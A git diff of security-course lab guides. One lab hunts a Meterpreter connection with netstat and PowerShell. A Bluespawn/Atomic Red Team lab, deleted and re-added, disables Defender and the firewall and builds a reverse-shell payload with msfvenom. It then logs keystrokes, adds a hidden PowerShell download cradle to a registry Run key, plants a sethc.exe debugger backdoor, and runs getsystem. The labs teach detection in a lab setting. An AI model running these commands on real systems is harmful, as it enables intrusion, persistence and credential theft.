-![](attachments/windowscli_sets.png)
+<img width="711" height="108" alt="2026-03-15_23-39" src="https://github.com/user-attachments/assets/68a2b59f-01ae-4500-88cc-563275be4cb7" />
 
 Next, we need to set the **SMB** username and password. 
 
-<pre>set SMBUSER Administrator</pre>
+```bash
+set SMBUSER Administrator
+```
 
-<pre>set SMBPASS password1234</pre>
+```bash
+set SMBPASS password1234
+```
 
 >[!NOTE]
 >
@@ -104,13 +127,27 @@ Next, we need to set the **SMB** username and password.
 
 It should look like this:
 
-![](attachments/windowscli_setuserpass.png)
+<img width="556" height="81" alt="2026-03-15_23-40" src="https://github.com/user-attachments/assets/293e8c74-5e42-4108-b52e-b94f48536cdb" />
+
+Now let's set the target to upload a **Raw Executable** instead of a **PowerShell Script**
+
+```bash
+show targets
+```
+
+```bash
+set TARGET 2
+```
+
+<img width="456" height="344" alt="2026-03-15_23-56" src="https://github.com/user-attachments/assets/1554429f-fa6a-43e9-b202-bc32c8356223" />
 
 Now, we can run the exploit command
 
-<pre>exploit</pre>
+```bash
+exploit
+```
 
-![](attachments/windowscli_exploit.png)
+<img width="964" height="262" alt="2026-03-15_23-57" src="https://github.com/user-attachments/assets/d49e2fb2-0a0d-4cb3-a4a8-1771dd4f70c4" />
 
 While there is not much here for this lab, it is key to remember that these two commands would help us detect an attacker that is mounting shares on other computers (net view).  It would also tell us if an attacker had mounted a share on this system (net session). 
 
@@ -118,80 +155,98 @@ We are not done with network connections yet.  Lets try looking at our malware!
 
 Go ahead an open an instance of **Windows PowerShell**.
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/be17e180-e1a4-4b42-b537-9b2931ac0284" />
 
 Run the following command:
 
-<pre>netstat -naob</pre>
+```ps
+netstat -naob
+```
+
+<img width="743" height="578" alt="2026-03-16_00-02" src="https://github.com/user-attachments/assets/a30004d5-0d95-4800-93a3-8debde52f3a2" />
 
-![](attachments/windowscli_netstat.png)
 
 Well, that is a lot of data. This is showing us which ports are open on this system **(0.0.0.0:portnumber)** or **(LISTENING)**.
 As well as the remote connections that are made to other systems **(ESTABLISHED)**.  In this example, we are really interested in the **ESTABLISHED** connections:
 
-![](attachments/windowscli_established.png)
+```ps
+netstat -naob | findstr ESTABLISHED
+```
 
-Specificly, we are interested in the connection on port 4444 as we know this is the port we used for our malware.
+<img width="945" height="387" alt="2026-03-16_00-01" src="https://github.com/user-attachments/assets/4bb6bd11-5df0-4d05-8120-1a80c4c2bdf8" />
 
-Now, let's drill down on that connection with some more data:
+Specificly, we are interested in the connection on **port 4444** as we know this is the port we used for our malware.
 
-<pre>netstat -f</pre>
 
-I like to run **"-f"** with netstat to see if there are any systems with fully qualified domains that we may be able to ignore. 
-
-![](attachments/windowscli_-f.png)
-
-Now we see our last connection with the **port 4444**.
 
 Let's get the Process ID **(PID)** from the output of our **"netstat -naob"** command that we ran earlier so we can dig a little deeper.
 
 >[!TIP]
 >
->Look for port **4444** and **[powershell.exe]**
-
-![](attachments/windowscli_pid.png)
+>Look for port **4444**, it is the number right after `ESTABLISHED`
 
 We will start with tasklist  
 
-<pre>tasklist /m /fi "pid eq [PID]"</pre>
+```ps
+tasklist /m /fi "pid eq [PID]"
+```
 
 >[!NOTE]
 >
 >**YOUR PID WILL BE DIFFERENT!**
 
-![](attachments/windowscli_tasklist.png)
+<img width="741" height="232" alt="2026-03-16_00-11" src="https://github.com/user-attachments/assets/c8e34f5e-41d5-48b8-967e-9ebf6da6aae6" />
 
 We can see the loaded **DLL's** above.  As we can see, there is not a whole lot to see here:
 
 Let's keep digging with **wmic**:
 
-<pre>wmic process where processid=[PID] get commandline</pre>
+```bash
+(Get-WmiObject Win32_Process -Filter "ProcessId=[PID]").CommandLine
+```
+
+<img width="858" height="44" alt="2026-03-16_00-24" src="https://github.com/user-attachments/assets/b8ccc4ee-3b90-4aaa-a4e4-b83e501aed71" />
 
-![](attachments/windowscli_wmic.png)
+A perfectly normal **Windows DLL**... or so it would seem... once **Meterpreter** loads, it overwrites its own process command line in memory as an evasion technique. This is intentional anti-forensics behavior built into Meterpreter, and so, here, it spawns as `rundll32.exe` - a trusted **Windows Process**
 
-Ahh!!  Now we can see that the file was launched from the **command line**!  We know this because there are no options.
+To try to dig deeper, let's print every process making a network connection, a pretty hefty command:
 
-Let's see if we can see what spawned the process with **wmic**.
+```bash
+Get-NetTCPConnection -State Established | ForEach-Object {
+    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
+    [PSCustomObject]@{
+        Process = $proc.Name
+        PID = $_.OwningProcess
+        LocalPort = $_.LocalPort
+        RemoteAddress = $_.RemoteAddress
+        RemotePort = $_.RemotePort
+    }
+}
+```
 
-<pre>wmic process get name,parentprocessid,processid | select-string [PID]</pre>
+<img width="970" height="567" alt="1" src="https://github.com/user-attachments/assets/1b6d9e19-cf31-42ad-aa3a-0d4c91f68783" />
 
-![](attachments/windowscli_selectstring.png)
+Scroll until you see `rundll32.exe`
+
+<img width="322" height="113" alt="2" src="https://github.com/user-attachments/assets/1873ffbb-ef95-42ff-8499-c32b5bfe586c" />
+
+HA!! An outbound connection to the **attacker**!!!
 
 Lets go through the steps we took to hunt for a malicious process
 
-1. We found its parent process ID.  
+1. We looked for **ESTABLISHED** connections
 
-2. We did a search on that process ID.  
+2. We did a search on that **process ID**
 
-3. As you can see above, it was launched by the cmd.exe process.  
+3. We saw the connection was made by a **Trusted Windows Process**
 
-4. Note that the search we just did may turn up some other things launched by the command line as well.
+4. We dug deeper to see all processes making connections, and confirmed our suspicions that the **process** was used **maliciously**, because `rundll32.exe` should never be making outbound **TCP connections**
 
 ***                                                                 
 
 <b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/Wireshark/Wireshark.md)</i></b>
 
-<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/TCPDump/TCPDump.md)</i></b>
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/WebLogReview/WebLogReview.md)</i></b>
 
 <b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
@@ -211,3 +266,5 @@ Please be sure to destroy the lab environment!
 
  
 
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/Bluespawn.md b/IntroClassFiles/Tools/IntroClass/bluespawn/Bluespawn.md
deleted file mode 100755
index 57d5f309..00000000
--- a/IntroClassFiles/Tools/IntroClass/bluespawn/Bluespawn.md
+++ /dev/null
@@ -1,328 +0,0 @@
-
-
-# Atomic Red Team And Bluespawn
-
-In this lab we will be using Bluespawn as a stand-in for an EDR system.  Normally full EDRs like Cylance and Crowdstrike are very expensive and tend not to show up in classes like this.  However, the folks at University of Virginia have done an outstanding job with BlueSpawn. 
-
-BlueSpawn will monitor the system for "weird" behavior and note it when it occurs. For the money, it is great.
-
-In this lab, we will be starting BlueSpawn and then running Atomic Red Team to trigger a lot of alerts.
-
-First, let’s disable Defender. Simply run the following from an Administrator PowerShell prompt:
-
-
-<img width="55" height="44" alt="image" src="https://github.com/user-attachments/assets/c6451afe-6928-4fec-8f65-967aa8274dfb" />
-
-
-
-`Set-MpPreference -DisableRealtimeMonitoring $true`
-
-This will disable Defender for this session.
-
-If you get angry red errors, that is Ok, it means Defender is not running.
-
-
-Now, let's open a command Prompt:
-
-
-
-<img width="48" height="41" alt="image" src="https://github.com/user-attachments/assets/159f5d32-8de1-4b56-8413-34ee7b4e285e" />
-
-
-
-
- 
-Next, let’s change directories to tools and start Bluespawn:
-
-C:\Users\adhd>`cd \IntroLabs`
-
-C:\IntroLabs>`BLUESPAWN-client-x64.exe --monitor --level Cursory`
-
-
-![](attachments/Clipboard_2020-06-16-09-46-00.png)
-
-Now, let’s use Atomic Red Team to test the monitoring with BlueSpawn:
-
-First, we need to open a PowerShell Prompt:
-
-![](attachments/Clipboard_2020-06-16-09-55-12.png)
-
-Lets install and update Atomic Red Team
-
-PS C:\Users\adhd> `cd \`
-
-PS C:\Users\adhd>`IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
-Install-AtomicRedTeam -getAtomics -Force`
-
-Please note this can take a bit. After about 120 seconds, try hitting enter to get your prompt back.
-
-Next, in the PowerShell Window we need to navigate to the Atomic Red Team directory and import the powershell modules:
-
-PS C:\Users\adhd> `cd C:\AtomicRedTeam\invoke-atomicredteam\`
-
-Then, install the proper yaml modules
-
-PS C:\Users\adhd> `Install-Module -Name powershell-yaml`
-
-PS C:\AtomicRedTeam\invoke-atomicredteam> `Import-Module .\Invoke-AtomicRedTeam.psm1`
-
-
-Now, we need to invoke all the Atomic Tests.
-
-Special note...  Don't do this in production...  Ever.  Always run tools like Atomic Red Team on test systems.  We recommend that you run in on a system with your EDR/Endpoint protection in non-blocking/alerting mode.  This is so you can see what the protection would have done, but it will allow the tests to finish so we are just going to run individual tests for now.
-
-PS C:\AtomicRedTeam\invoke-atomicredteam> `Invoke-AtomicTest T1547.004`
-
-More information here:
-
-https://attack.mitre.org/techniques/T1547/004/
-
-PS C:\AtomicRedTeam\invoke-atomicredteam> `Invoke-AtomicTest T1543.003`
-
-More information here:
-
-https://attack.mitre.org/techniques/T1543/003/
-
-PS C:\AtomicRedTeam\invoke-atomicredteam> `Invoke-AtomicTest T1547.001`
-
-More information here:
-
-https://attack.mitre.org/techniques/T1547/001/
-
-PS C:\AtomicRedTeam\invoke-atomicredteam> `Invoke-AtomicTest T1546.008`
-
-More information here:
-
-https://attack.mitre.org/techniques/T1546/008/
-
-If you get any “file exists” questions or errors, just select Yes.
-
-It should look like this:
-
-![](attachments/Clipboard_2020-06-16-09-48-18.png)
-
-Please note, there will be some errors when this runs.  This is normal.
-
-Please note we had to cross reference the old numbering witgh the new.
-
-You can find that mapping here:
-
-https://attack.mitre.org/docs/subtechniques/subtechniques-crosswalk.json
-
-
-You should be getting a lot of alerts with Bluespawn Switch tabs in your Terminal to see them:
-
-![](attachments/Clipboard_2020-06-16-09-47-26.png)
-
-
-
-# If you have more time
-
-Let’s begin by disabling **Defender**. Simply run the following from an **Administrator PowerShell** prompt:
-
-<img width="54" height="39" alt="image" src="https://github.com/user-attachments/assets/a0e67fe8-d42a-4795-b566-98dc7a82daa8" />
-
-
-Next, run the following command in the **Powershell** terminal:
-
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
-
-<img width="786" height="223" alt="image" src="https://github.com/user-attachments/assets/def5f9b6-22c7-4278-9b37-fbfb5af3a02e" />
-
-This will disable **Defender** for this session.
-
-If you get angry red errors, that is **Ok**, it means **Defender** is not running.
-
-Next, lets ensure the firewall is disabled. In a Windows Command Prompt.
-
-<pre> netsh advfirewall set allprofiles state off</pre>
-
-
-Next, set a password for the Administrator account that you can remember
-
-<pre>net user Administrator password1234</pre>
-
-Please note, that is a very bad password.  Come up with something better. But, please remember it.
-
-Before we move on from our Powershell window, lets get our IP by running the following command:
-
-<pre>ipconfig</pre>
-
-
-**REMEMBER - YOUR IP WILL BE DIFFERENT**
-
-Write this IP down so we can use it again later.
-
-Let's continue by opening a **Kali** terminal
-
-<img width="71" height="68" alt="image" src="https://github.com/user-attachments/assets/5f116093-6854-4e55-a231-0c42359dc163" />
-
-Alternatively, you can click on the **Kali** icon in the taskbar.
-
-
-We need to run the following commands in order to mount our remote system to the correct directory:
-
-<pre>sudo su -</pre>
-
-<pre>mount -t cifs //[Your IP Address]/c$ /mnt/windows-share -o username=Administrator,password=password1234</pre>
-
-**REMEMBER - YOUR IP ADDRESS AND PASSWORD WILL BE DIFFERENT.**
-
-
-
-Run the following command to navigate into the mounted directory:
-
-<pre>cd /mnt/windows-share</pre>
-
-<img width="645" height="251" alt="image" src="https://github.com/user-attachments/assets/b3a98a1f-559f-46b3-8967-88457212d1ee" />
-
-
-Before we run the next commands, we need to get the IP of our Kali System (AKA our Linux IP Adress). Lets do so by running the following:
-
-<pre>ifconfig</pre>
-
-<img width="660" height="419" alt="image" src="https://github.com/user-attachments/assets/d88c93b2-c80f-4a88-ba71-3e82cbcf20a2" />
-
-
-**REMEMBER: YOUR IP WILL BE DIFFERENT**
-
-Run the following commands to start a simple backdoor and backdoor listener: 
-
-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>
-
-<img width="646" height="148" alt="image" src="https://github.com/user-attachments/assets/d84a0070-9c3f-47cb-b1b4-ea447ddbdeef" />
-
-
-
-Let's start the **Metasploit** Handler.  Open a new **Kali** terminal by clicking the **Kali** icon in the taskbar.
-
-<img width="71" height="68" alt="image" src="https://github.com/user-attachments/assets/5f116093-6854-4e55-a231-0c42359dc163" />
-
-
-Let's become root.
-
-<pre>sudo su -</pre>
-
-Now let's start the **Metasploit** Handler
-
-<pre>msfconsole -q</pre>
-
-We are going to run the following commands to correctly set the parameters:
-
-<pre>use exploit/multi/handler</pre>
-
-<pre>set PAYLOAD windows/meterpreter/reverse_tcp</pre>
-
-<pre>set LHOST [Your Linux IP Address]</pre>
-
-Remember, **Your IP will be different!**
-
-<pre>exploit</pre>
-
-It should look like this:
-
-<img width="636" height="405" alt="image" src="https://github.com/user-attachments/assets/ca5787cd-967d-45b0-ac90-327b4eabfe69" />
-
-
-We will need to open a **"cmd.exe"** terminal as **Administrator**.
-
-<img width="53" height="40" alt="image" src="https://github.com/user-attachments/assets/47d5e363-0b2a-4009-a117-6103db26870d" />
-
-
-
-let's run the following commands to run the **"TrustMe.exe"** file.
-
-<pre>cd \</pre>
- 
-Then run it with the following:
-
- <pre>TrustMe.exe</pre>
-
-Back at your Kali terminal, you should have a metasploit session!
-
-![](attachments/meterpretersession.png)
-
-
-Now, let’s look at keystroke logging.
-
-To learn more about this check out MITRE:
-
-https://attack.mitre.org/techniques/T1056/
-
-Also, below is a list of just some of the threat groups that use this technique:
-
-<img width="1072" height="723" alt="image" src="https://github.com/user-attachments/assets/c005128b-124b-4bcc-9bf7-8516ca4be2d6" />
-
-
-Run commands
-
-meterpreter > `keyscan_start`
-
-Go and type something on your Windows system.
-
-meterpreter > `keyscan_dump`
-
-![](attachments/Clipboard_2020-06-15-13-52-00.png)
-
-
-Go and check Bluespawn.  Did it detect it?
-
-Now, let’s play with registry persistence.
-
-To learn more about this check out MITRE:
-
-https://attack.mitre.org/techniques/T1547/
-
-Here are just some of the groups that use this technique:
-
-<img width="1072" height="533" alt="image" src="https://github.com/user-attachments/assets/86040c18-29cd-4d16-95dd-84e45dcb1f63" />
-
-
-meterpreter > `shell`
-
-C:\> `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Payload /d "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://172.20.243.5:80/a'))\"" /f`
-
-C:\>  `reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"`
-
-![](attachments/Clipboard_2020-06-15-14-00-53.png)
-
-Go and check Bluespawn.  Did it detect it?
-
-Next, let’s play with privilege escalation.
-
-Here is al link to more info about this from MITRE:
-
-https://attack.mitre.org/techniques/T1543/
-
-Here are just some of the groups that use this technique:
-
-<img width="1087" height="489" alt="image" src="https://github.com/user-attachments/assets/41b91eb5-8505-48a3-bee0-09cbb87f9dca" />
-
-
-meterpreter >`getsystem`
-
-![](attachments/Clipboard_2020-06-15-13-52-28.png)
-
-
-![](attachments/Clipboard_2020-06-15-13-56-34.png)
-
-Go and check Bluespawn.  Did it detect it?
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Bluespawn.md b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Bluespawn.md
new file mode 100755
index 00000000..0b1fbd32
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Bluespawn.md
@@ -0,0 +1,434 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Atomic Red Team And Bluespawn
+
+In this lab we will be using Bluespawn as a stand-in for an EDR system.  Normally full EDRs like Cylance and Crowdstrike are very expensive and tend not to show up in classes like this.  However, the folks at University of Virginia have done an outstanding job with BlueSpawn. 
+
+BlueSpawn will monitor the system for "weird" behavior and note it when it occurs. For the money, it is great.
+
+In this lab, we will be starting BlueSpawn and then running Atomic Red Team to trigger a lot of alerts.
+
+First, we need to disable Defender. 
+Start by opening up <b>Windows Powershell</b>.
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+
+Next, run the following command:
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+```ps
+Set-MpPreference -DisableBehaviorMonitoring $true
+```
+
+<img width="824" height="155" alt="2026-03-26_09-47" src="https://github.com/user-attachments/assets/d83571b4-0a39-4e4b-a9ef-cf6763954e2c" />
+
+
+This will disable Defender for this session.
+
+>[!NOTE]
+>
+>If you get angry red errors, that is Ok, it means Defender is not running.
+
+
+Now, let's open a **command prompt**:
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/f62f8205-8828-4a2b-97f0-e7137ec466e5" />
+
+ 
+Next, let’s change directories to tools and start Bluespawn:
+
+```bash
+cd \IntroLabs
+```
+
+```bash
+BLUESPAWN-client-x64.exe --monitor --aggressiveness cursory
+```
+
+You should see something like this:
+
+<img width="862" height="638" alt="2026-03-26_09-50" src="https://github.com/user-attachments/assets/a3419596-b4ca-4ea1-8d2a-832046873f76" />
+
+
+If you made it this far, perfect! That means Bluespawn is up and running.
+
+Now, let’s use Atomic Red Team to test the monitoring with BlueSpawn:
+
+First, we need to open a PowerShell terminal. 
+
+You can do this by selecting the icon in the taskbar/desktop:
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+Now we need to install and update Atomic Red Team. Run the following:
+
+```bash
+cd \
+```
+
+```ps
+IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
+Install-AtomicRedTeam -getAtomics -Force
+```
+
+>[!NOTE]
+>
+> This can take a bit. After about 120 seconds, try hitting enter to get your prompt back.
+
+Once you see the following, you are set to move forward:
+
+<img width="1100" height="292" alt="2026-03-26_09-54" src="https://github.com/user-attachments/assets/41cb6202-0911-480c-bb68-0953bf66a213" />
+
+
+Next, in the PowerShell Window we need to navigate to the Atomic Red Team directory and import the powershell modules:
+
+```ps
+cd C:\AtomicRedTeam\invoke-atomicredteam\
+```
+
+Then, install the proper `yaml` modules by running the following:
+
+```ps
+Install-Module -Name powershell-yaml
+```
+
+>[!NOTE]
+>
+>When prompted, press Y to install the modules.
+
+```ps
+Import-Module .\Invoke-AtomicRedTeam.psm1
+```
+
+
+Once we do this, we need to invoke all the Atomic Tests.
+
+>[!IMPORTANT]  
+>
+>Don't do this in production...  Ever.
+>  
+>Always run tools like Atomic Red Team on test systems.
+>
+>We recommend that you run in on a system with your EDR/Endpoint protection in non-blocking/alerting mode. This is so you can see what the protection would have done, but it will allow the tests to finish so we are just going to run individual tests for now.
+
+Run the following individually:
+
+```ps
+Invoke-AtomicTest T1547.004
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1547/004/
+
+```ps
+Invoke-AtomicTest T1543.003
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1543/003/
+
+```ps
+Invoke-AtomicTest T1547.001
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1547/001/
+
+```ps
+Invoke-AtomicTest T1546.008
+```
+
+More information here:
+
+https://attack.mitre.org/techniques/T1546/008/
+
+
+>[!TIP]
+>
+>If you get any “file exists” questions or errors, just select `Yes`.
+
+It should look like this:
+
+<img width="633" height="264" alt="2026-03-26_10-00" src="https://github.com/user-attachments/assets/3cc66d66-4156-45be-b149-e81145a1a920" />
+
+
+>[!NOTE]
+>
+>There might be some errors when this runs. This is 
+normal.
+
+>[!IMPORTANT]
+>
+>We had to cross reference the old numbering with the new.
+>
+>You can find that mapping here:
+>
+>https://attack.mitre.org/docs/subtechniques/subtechniques-crosswalk.json
+>
+>![](attachments/crossreference.png)
+
+
+You should be getting a lot of alerts with Bluespawn! Switch tabs in your Terminal to see them:
+
+<img width="1096" height="631" alt="2026-03-26_10-09" src="https://github.com/user-attachments/assets/135ce716-47fb-4840-b6a2-1c00c999bc87" />
+
+
+Now, let’s go back to the PowerShell window and clean up:
+
+```ps
+Invoke-AtomicTest All -Cleanup
+```
+
+It should look like this:
+
+<img width="1093" height="444" alt="2026-03-26_10-06" src="https://github.com/user-attachments/assets/2dd53a33-3c40-4cf8-9d86-bb18c3bb7ec5" />
+
+
+# If you have more time
+
+Let’s begin by disabling **Defender**. Simply run the following from an **Administrator PowerShell** prompt:
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/685d264c-661c-4dbf-aa79-54f925cefdb1" />
+
+
+Next, run the following command in the **Powershell** terminal:
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+<img width="820" height="139" alt="2026-03-26_10-20" src="https://github.com/user-attachments/assets/446b50ed-75b5-4e04-a505-559833112aa1" />
+
+
+This will disable **Defender** for this session.
+
+If you get angry red errors, that is **Ok**, it means **Defender** is not running.
+
+Open **Command Prompt**
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/761a7584-f744-4f6a-926b-339891c1d5b4" />
+
+Next, lets ensure the firewall is disabled. In a Windows Command Prompt.
+
+```cmd
+netsh advfirewall set allprofiles state off
+```
+
+
+Next, set a password for the Administrator account that you can remember
+
+```bash
+net user Administrator password1234
+```
+
+Please note, that is a very bad password.  Come up with something better. But, please remember it.
+
+Let's continue by opening an **Ubuntu** terminal
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/dc26dda4-12b8-4f03-8a07-f170e5064f8d" />
+
+
+
+Become root:
+
+```bash
+sudo su -
+```
+
+
+Before we run the next commands, we need to get the **IP** of our **Linux System**. Lets do so by running the following:
+
+```bash
+ifconfig
+```
+
+<img width="716" height="175" alt="Get_IPLinux" src="https://github.com/user-attachments/assets/55ffa0a2-0502-4331-ad4e-720b1c1f4205" />
+
+**REMEMBER: YOUR IP WILL BE DIFFERENT**
+
+Run the following commands to start a simple backdoor and backdoor listener: 
+
+```bash
+cd /tmp/
+```
+
+
+
+Run the following commands to start a simple backdoor and backdoor listener: 
+
+```bash
+
+msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe > /tmp/TrustMe.exe
+```
+
+
+
+<img width="1096" height="136" alt="2026-03-26_10-33" src="https://github.com/user-attachments/assets/cedde4be-e44e-4bab-87bb-5a683603e50f" />
+
+
+
+
+Now let's start the **Metasploit** Handler
+
+```bash
+msfconsole -q
+```
+
+We are going to run the following commands to correctly set the parameters:
+
+```bash
+use exploit/multi/handler
+```
+
+```bash
+set PAYLOAD windows/meterpreter/reverse_tcp
+```
+
+```bash
+set LHOST [Your Linux IP Address]
+```
+
+Remember, **Your IP will be different!**
+
+```bash
+exploit
+```
+
+It should look like this:
+
+<img width="687" height="206" alt="2026-02-23_15-38" src="https://github.com/user-attachments/assets/71226123-2163-4237-8173-c7586de81ee7" />
+
+
+
+
+Open up a **Powershell** terminal, copy the file over from **Linux**
+
+```ps
+cd .\Desktop\
+```
+
+```ps
+scp ubuntu@linux.cloudlab.lan:/tmp/TrustMe.exe .
+```
+
+Open a **Command Prompt**
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/62be252d-35ca-41a4-8ade-ba5d8a8478bb" />
+
+
+Let's run the following commands to run the **"TrustMe.exe"** file.
+
+```cmd
+cd \Users\Administrator\Desktop
+```
+ 
+Then run it with the following:
+
+```cmd
+TrustMe.exe
+```
+
+Back at your Ubuntu terminal, you should have a metasploit session!
+
+<img width="987" height="392" alt="2026-03-26_10-44" src="https://github.com/user-attachments/assets/152dd3e7-11d7-43d8-85f6-45d0870cc725" />
+
+Now, let’s look at keystroke logging.
+
+To learn more about this check out MITRE:
+
+https://attack.mitre.org/techniques/T1056/
+
+Also, below is a list of just some of the threat groups that use this technique:
+
+<img width="1072" height="723" alt="image" src="https://github.com/user-attachments/assets/c005128b-124b-4bcc-9bf7-8516ca4be2d6" />
+
+
+Run commands
+
+meterpreter > `keyscan_start`
+
+Go and type something on your Windows system.
+
+meterpreter > `keyscan_dump`
+
+![](attachments/Clipboard_2020-06-15-13-52-00.png)
+
+
+Go and check Bluespawn.  Did it detect it?
+
+Now, let’s play with registry persistence.
+
+To learn more about this check out MITRE:
+
+https://attack.mitre.org/techniques/T1547/
+
+Here are just some of the groups that use this technique:
+
+<img width="1072" height="533" alt="image" src="https://github.com/user-attachments/assets/86040c18-29cd-4d16-95dd-84e45dcb1f63" />
+
+
+meterpreter > `shell`
+
+C:\> `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Payload /d "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://172.20.243.5:80/a'))\"" /f`
+
+C:\>  `reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"`
+
+![](attachments/Clipboard_2020-06-15-14-00-53.png)
+
+Go and check Bluespawn.  Did it detect it?
+
+Next, let’s play with privilege escalation.
+
+Here is al link to more info about this from MITRE:
+
+https://attack.mitre.org/techniques/T1543/
+
+Here are just some of the groups that use this technique:
+
+<img width="1087" height="489" alt="image" src="https://github.com/user-attachments/assets/41b91eb5-8505-48a3-bee0-09cbb87f9dca" />
+
+
+meterpreter >`getsystem`
+
+![](attachments/Clipboard_2020-06-15-13-52-28.png)
+
+
+![](attachments/Clipboard_2020-06-15-13-56-34.png)
+
+Go and check Bluespawn.  Did it detect it?
+
+***                                                                 
+
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Clipboard_2020-06-12-10-36-44.png
new file mode 100755
index 00000000..4175daf4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Clipboard_2020-06-12-10-36-44.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png
new file mode 100755
index 00000000..4175daf4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-00.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-00.png
new file mode 100755
index 00000000..1282f24a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-28.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-28.png
new file mode 100755
index 00000000..491f5174
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-52-28.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-56-34.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-56-34.png
new file mode 100755
index 00000000..1d8d55c1
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-13-56-34.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-14-00-53.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-14-00-53.png
new file mode 100755
index 00000000..7db33826
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-15-14-00-53.png differ
